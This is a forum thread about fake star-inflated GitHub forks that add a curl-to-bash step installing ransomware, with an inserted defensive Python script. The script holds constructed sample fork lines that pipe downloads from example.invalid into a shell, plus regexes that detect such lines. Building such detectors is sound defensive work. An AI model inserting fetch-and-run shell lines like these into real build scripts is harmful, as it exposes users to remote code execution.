Apparently there’s a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly gets a pile of stars more than the original, and then there’s a curl-bash pipe inserted into it that runs some ransomware that encrypts ~/Documents.
About a dozen other projects linked in here from another developer (excuse the Reddit link): https://old.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/
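Added example, not part of the original post or of any affected project: a review check that diffs a fork's file against the upstream copy and flags only the lines the fork added that pipe a download into a shell. The file contents and the `example.invalid` URLs are constructed, and the function names are hypothetical.

```python
import difflib
import re

# Download tool whose output is piped (optionally via sudo) into a shell.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
# Shell running a command/process substitution that downloads.
SUBST_TO_SHELL = re.compile(
    r"\b(?:ba|z|da)?sh\b\s+(?:-c\s+)?[\"']?(?:\$\(|<\()\s*(?:curl|wget)\b")

# Constructed sample: upstream build script and the same file in a fork.
UPSTREAM = """#!/bin/sh
set -e
go build -o bin/tool ./cmd/tool
install -m 0755 bin/tool /usr/local/bin/tool
"""
FORK = """#!/bin/sh
set -e
curl -fsSL https://example.invalid/release.tgz | shasum -a 256
curl -fsSL https://example.invalid/setup.sh | bash
go build -o bin/tool ./cmd/tool
bash -c "$(wget -qO- https://example.invalid/x)"
install -m 0755 bin/tool /usr/local/bin/tool
"""

def added_lines(upstream: str, fork: str):
    """Yield (fork_line_number, text) for lines in fork but not in upstream."""
    a, b = upstream.splitlines(), fork.splitlines()
    matcher = difflib.SequenceMatcher(a=a, b=b, autojunk=False)
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            for j in range(j1, j2):
                yield j + 1, b[j]

def flag_fork(upstream: str, fork: str):
    """Return fork-only lines that fetch remote content and execute it."""
    return [(n, line.strip()) for n, line in added_lines(upstream, fork)
            if PIPE_TO_SHELL.search(line) or SUBST_TO_SHELL.search(line)]

if __name__ == "__main__":
    for number, text in flag_fork(UPSTREAM, FORK):
        print(f"fork line {number}: {text}")
```

A pattern match like this only narrows down what to read by hand; an obfuscated or encoded command will not match it.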
use windows iif ytu dodn watn virus
You can’t get a virus if your computer’s already dependent on one!
Tru. With Windows defender 💪 i can downloat evry .exe from ze internetz. I currently installing Gta 6 early 😎
I tried that, I ended up with this weird “Windows 11” adware installed and couldn’t get rid of it. There was also a problem with odd programs and advertising showing up in my Start Menu, even after I removed them. Also, my settings would occasionally just change, without my knowledge or permission.
This isn’t really a supply chain attack. It’s more social engineering: fake users, forks, and non-verified code. They’re taking advantage of the fact that most people don’t use verified releases or packages code from open source projects.
GitHub is not compromised, nor sending unintended payloads.
Many of the projects are backend dev tools, like the Atlas provider linked in the thread.
But that’s not a supply chain attack. If projects or platforms are compromised and THEN their code is used by normal means of ingestion of said project, that would be a supply chain attack.
These are unofficial channels created as forks of existing projects in an attempt to fool users into using these instead.
OK, fair enough, I changed the title.
Joke’s on them, I don’t keep shit in ~/Documents, all my goodies are on a network share mounted at ~/Netstore
Hahaha. Was about to comment nearly the same thing. My NFS share has a different mount.
~/Documents is an empty directory
Finally, Linux is popular enough to get targeted by malware!
Another reason that star count is a terrible metric for quality / authenticity. Fake stars are a huge problem that not a lot of people take seriously.
lol, just checked. ~/Documents doesn’t even exist on my machine.
Average arch user
oh oh, I’m a below average arch user. I suspect I copied most of my home from debian or something.
I’ll rename it to Dickuments as a security feature.
…the fuck is that title? I got a headache trying to make sense of it.
Yah, I read it afterwards and realized I’d verbed a noun. I’m not proud of it.
Here in Lemmy you can edit titles
I keep saying this curl bash pipe shit needs to stop.
It’s an interesting thing to think about, wouldn’t widespread desktop Linux malware be quite bad because of the lack of any AV/Malware detection typically used?
Uhhhhh, there’s plenty of that being used. From the ground up. Security scanning out the wazzzz. Those are pattern-based scanners though, and this probably wouldn’t be detected because it’s a blob of binary junk with a script inside. GitHub should honestly put something on their storage backends to warn users, but that’s a whole ball of wax people probably don’t want to get into.
Yay, finally Linux is being attacked!
And as expected it takes whole lot more than clicking on an email attachment
Always check before you curl download something!
good time to not have a ~/Documents and keep backups encrypted off site
That simply wouldn’t work on non-English machines lmao
Why the Documents folder tho? Who expects important stuff to be there?
Now all my Linux ISOs are gone, smh